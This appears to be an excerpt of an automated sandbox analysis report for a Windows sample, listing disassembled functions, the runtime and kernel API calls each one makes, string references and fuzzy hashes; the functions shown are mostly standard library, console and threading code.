Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: FileInfoSleepStartupType
String ID:
API String ID: 1527402494-0
Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301

Function 0000000140009E30 Relevance: 7.6, APIs: 5, Instructions: 74COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E3E
GetLastError.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E5E
GetCommandLineA.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E9B
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009EBB

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: CommandLine$ByteCharErrorLastMultiWide
String ID:
API String ID: 3078728599-0
Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00

Function 000000014000FD50 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDAC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDC7

Part of subcall function 0000000140010B30: CreateFileA.KERNEL32 ref: 0000000140010B5A

GetConsoleOutputCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDDC
WideCharToMultiByte.KERNEL32 ref: 000000014000FE0D
WriteConsoleA.KERNEL32 ref: 000000014000FE32

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
String ID:
API String ID: 1850339568-0
Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00

Function 00007FFE1A51FB54 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FFE1A51FB7C
_set_statfp.LIBCMT ref: 00007FFE1A51FB97
_set_statfp.LIBCMT ref: 00007FFE1A51FBB3
_set_statfp.LIBCMT ref: 00007FFE1A51FBEF

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
Instruction ID: 4c66fb6570d3b2361dc4d94958eeff089919dbb898f476bea13e0e95e66983e9
Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
Instruction Fuzzy Hash: 54119476F1CE0B41F754116AE5F637912436FABBB4F1446F7E5AE063FA8E2CA8484101

Function 00007FFE1A519684 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FFE1A51766F,?,?,00000000,00007FFE1A51790A,?,?,?,?,?,00007FFE1A517896), ref: 00007FFE1A5196A3
FlsSetValue.KERNEL32(?,?,?,00007FFE1A51766F,?,?,00000000,00007FFE1A51790A,?,?,?,?,?,00007FFE1A517896), ref: 00007FFE1A5196C2
FlsSetValue.KERNEL32(?,?,?,00007FFE1A51766F,?,?,00000000,00007FFE1A51790A,?,?,?,?,?,00007FFE1A517896), ref: 00007FFE1A5196EA
FlsSetValue.KERNEL32(?,?,?,00007FFE1A51766F,?,?,00000000,00007FFE1A51790A,?,?,?,?,?,00007FFE1A517896), ref: 00007FFE1A5196FB
FlsSetValue.KERNEL32(?,?,?,00007FFE1A51766F,?,?,00000000,00007FFE1A51790A,?,?,?,?,?,00007FFE1A517896), ref: 00007FFE1A51970C

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
Instruction ID: bec66f72274ef4cde7cc6df405f19775c8c2e263caf48d2b5596f8c1e90a6592
Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
Instruction Fuzzy Hash: 5E115E24F0CA4289FA58A727659117961A39F47FF0F5443F7E83E866F6EE2CF4418200

Function 00007FFE1A519518 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FFE1A519529
FlsSetValue.KERNEL32 ref: 00007FFE1A519548
FlsSetValue.KERNEL32 ref: 00007FFE1A519570
FlsSetValue.KERNEL32 ref: 00007FFE1A519581
FlsSetValue.KERNEL32 ref: 00007FFE1A519592

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
Instruction ID: 78ad703d96acf2ff8486db924497f0dce39870cd7231b4f618812a97da081c60
Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
Instruction Fuzzy Hash: 6B115A54F0CA038AFA68A663549117921A34F53F74F5507F7D83E9A6F2ED2CB4418200

Function 00007FFE1A513A38 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE1A513A63
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FFE1A513AFA
RtlUnwindEx.KERNEL32 ref: 00007FFE1A513B54

Strings

csm, xrefs: 00007FFE1A513AE1

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
Instruction ID: 0962f6c1ff0f3b1346b15cdc3083d10c5537d059addc9f16929a96a363b2ed98
Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
Instruction Fuzzy Hash: 9551B331B1DA428ADB94CB16D464A787392EB45FB8F1081F2DA4E477A6EF7DE841C700

Function 00007FFE1A5159C8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE1A5159F0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFE1A515AD8

Strings

csm, xrefs: 00007FFE1A515A12
csm, xrefs: 00007FFE1A515B2A

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
Instruction ID: 83fc2d36671c7e545f831268309094aa13c79419e7f65d97d557f28b084cb995
Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
Instruction Fuzzy Hash: 7D51933270CB428ADB648B22949437877A2EB56FA9F1841F7DA5D477A5CF3CE451C700

Function 00007FFE1A5151D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FFE1A515237
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE1A515283

Strings

MOC, xrefs: 00007FFE1A51524B
RCC, xrefs: 00007FFE1A515253

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
Instruction ID: 8796d5cdbdf9be1d799c6108bc7b00a0a488b1119c77dfeb77f6c4f438cb440b
Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
Instruction Fuzzy Hash: 00618472A0CBC581D7608B26E4403BAB7A1FB85BA8F4442B6EB9D07765DF7CD190CB00

Function 00007FFE1A51EA8C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FFE1A51EBA3
GetLastError.KERNEL32 ref: 00007FFE1A51EBC5

Strings

U, xrefs: 00007FFE1A51EB4F
Rcl^i, xrefs: 00007FFE1A51EAAB

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: Rcl^i$U
API String ID: 442123175-666766751
Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
Instruction ID: e5cc03a6032945dbccd653eb8707596d6f43ec8a5330c4b63f0d1ae64d07c29a
Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
Instruction Fuzzy Hash: FE41A562B1DA4181DB20CF66E4443BA7762FB99BA4F4541B2EE4E877A4EF3CD441CB40

Function 000000014000EDC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2

GetModuleHandleA.KERNEL32 ref: 000000014000EE2D
GetProcAddress.KERNEL32 ref: 000000014000EE42

Strings

InitializeCriticalSectionAndSpinCount, xrefs: 000000014000EE38
kernel32.dll, xrefs: 000000014000EE26

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: AddressHandleLoadModuleProc
String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
API String ID: 3055805555-3733552308
Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700

Function 00007FFE1A511B70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(?,?,?,?,?,?,00007FFE1A517823), ref: 00007FFE1A511F92
capture_previous_context.LIBCMT ref: 00007FFE1A511FAA
__raise_securityfailure.LIBCMT ref: 00007FFE1A51204C

Strings

Rcl^i, xrefs: 00007FFE1A512024

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: FeaturePresentProcessor__raise_securityfailurecapture_previous_context
String ID: Rcl^i
API String ID: 838830666-2241636769
Opcode ID: c90aecb79054ed5aefee071c26408ead9e0bd02a82e93a49a12eca625693f40e
Instruction ID: cb55c8b8f050573013c7d9b727cd83bd589285775e44ca4b88c9616ce5d4db3d
Opcode Fuzzy Hash: c90aecb79054ed5aefee071c26408ead9e0bd02a82e93a49a12eca625693f40e
Instruction Fuzzy Hash: 5D21A866B0CF02C1FA408B56E8513747666FB86B64F6001FBD98D463B5EF7CA4498710

Function 00000001400026F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

#4.VSELOG ref: 000000014000271C
GetCurrentProcess.KERNEL32 ref: 0000000140002721
SetProcessWorkingSetSize.KERNEL32 ref: 0000000140002731

Strings

Shrinking process size, xrefs: 000000014000270E

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: Process$CurrentSizeWorking
String ID: Shrinking process size
API String ID: 2122760700-652428428
Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310

Function 00000001400030B0 Relevance: 6.3, APIs: 5, Instructions: 76COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00000001400030E7
LeaveCriticalSection.KERNEL32 ref: 000000014000316B
EnterCriticalSection.KERNEL32 ref: 0000000140003195
EnterCriticalSection.KERNEL32 ref: 00000001400031C6
LeaveCriticalSection.KERNEL32 ref: 00000001400031DD

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: CriticalSection$Enter$Leave
String ID:
API String ID: 2801635615-0
Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744

Function 00007FFE1A51ED1C Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A51ED07), ref: 00007FFE1A51EE38
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A51ED07), ref: 00007FFE1A51EEC3

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
Instruction ID: 8209a21af82db85e05bf9a8d19e659e7deeeb1412c212b39ada2aaaf9940838b
Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
Instruction Fuzzy Hash: 0191B3A2F1CE5185F7509B6694806BC2BA2AB06FA8F1441FBDE0E576A4DF38D486D700

Function 0000000140004760 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: CriticalEventSection$EnterLeaveReset
String ID:
API String ID: 3553466030-0
Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304

Function 0000000140004400 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000014000441F
ResetEvent.KERNEL32 ref: 00000001400044CB
SetEvent.KERNEL32 ref: 00000001400044D5
LeaveCriticalSection.KERNEL32 ref: 00000001400044DF

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: CriticalEventSection$EnterLeaveReset
String ID:
API String ID: 3553466030-0
Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344

Function 0000000140013670 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 000000014001367B
CreateEventW.KERNEL32 ref: 000000014001368D
CreateEventW.KERNEL32 ref: 00000001400136A7
CreateEventW.KERNEL32 ref: 00000001400136C0

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: CreateEvent$CriticalInitializeSection
String ID:
API String ID: 926662266-0
Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700

Function 00007FFE1A51B1E4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A51AB40: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FFE1A51AE7C), ref: 00007FFE1A51AB6A

IsValidCodePage.KERNEL32(?,?,?,00000001,?,00000000,?,00007FFE1A51AFAD), ref: 00007FFE1A51B251
GetCPInfo.KERNEL32(?,?,?,00000001,?,00000000,?,00007FFE1A51AFAD), ref: 00007FFE1A51B295

Strings

Rcl^i, xrefs: 00007FFE1A51B1FA

